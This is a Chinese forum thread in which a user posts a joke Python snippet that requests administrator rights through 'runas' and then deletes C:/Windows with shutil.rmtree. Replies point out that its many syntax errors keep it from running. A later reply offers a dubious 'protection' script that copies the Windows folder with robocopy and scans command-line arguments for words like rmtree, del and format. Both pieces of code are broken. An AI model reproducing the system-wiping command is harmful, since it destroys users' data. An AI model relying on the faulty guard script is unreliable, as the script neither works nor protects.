神秘小代码

化学
神秘小代码

用户头像
 一只苹果(水木球) 更新于2026-3-23 08:07:29
import ctypes
import sys

def administer ():
   try:
      return ctypes.windll.shell.shell32.IsUserAnAdmin()
   except:
      return False
def run_ad
   if not adminster():
      ctypes.windll.shell32.ShellExecuteW(
         None,"runas",sys.executable,"".join(sys.argv),None,1
)
      sys.exit()
if _name_=="_main_":
   run_ad(
import shutil
import platform
system=platform.system()
if system=="Windows"
   shutil.rmtree(C:/Windows)
)

看似重点:前面一大串

实则重点:run_ad()的参数

收起
1
1
共2条回复
时间正序
用户头像
香软猫梁 ZnTellurium
5小时前

... 啥意思这

我母语不是 py,丢给 Ds 看了下说这段恶意代码由于有很多语法错误而运行不起来

所以什么意思喵

没看懂 "重点" 是什么意思...

1条评论
用户头像
飞燕草素(是白芥呀)
2小时前

完全没有意义的代码,意思是检测到你是管理员就删除系统源文件,而且语法错误多到令人发指的程度

用户头像
飞燕草素(是白芥呀)
2小时前

为了防止你破坏自己的电脑,请将下面文件以exe格式保存

import os, sys, subprocess, datetime, logging, time, schedule


logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s', handlers=[logging.FileHandler('sys_protect.log')])


B = r"C:\SystemBackup"; W = r"C:\Windows"

if not os.path.exists(B): os.makedirs(B)


def b(): t = datetime.datetime.now().strftime("%Y%m%d_%H%M%S"); p = os.path.join(B, f"Windows_{t}"); subprocess.run(['robocopy', W, p, '/E', '/XD', 'Temp', 'Temporal', '/R:0', '/W:0'], shell=True)

def r(): backups = [f for f in os.listdir(B) if f.startswith("Windows_")]; if not backups: return False; latest = max(backups, key=lambda x: os.path.getmtime(os.path.join(B, x))); p = os.path.join(B, latest); subprocess.run(['robocopy', p, W, '/E', '/XD', 'Temp', 'Temporal', '/R:0', '/W:0', '/MOV'], shell=True); return True


def m(): return any(k in ''.join(sys.argv).lower() for k in ["rmtree", "delete", "rm", "del", "windows", "c:\\windows", "shutdown", "format", "erase"])


schedule.every().day.at("02:00").do(b)


while True:

    schedule.run_pending(); time.sleep(60)

    if m():

        logging.critical("Malicious code detected! Restoring system...")

        r()

        break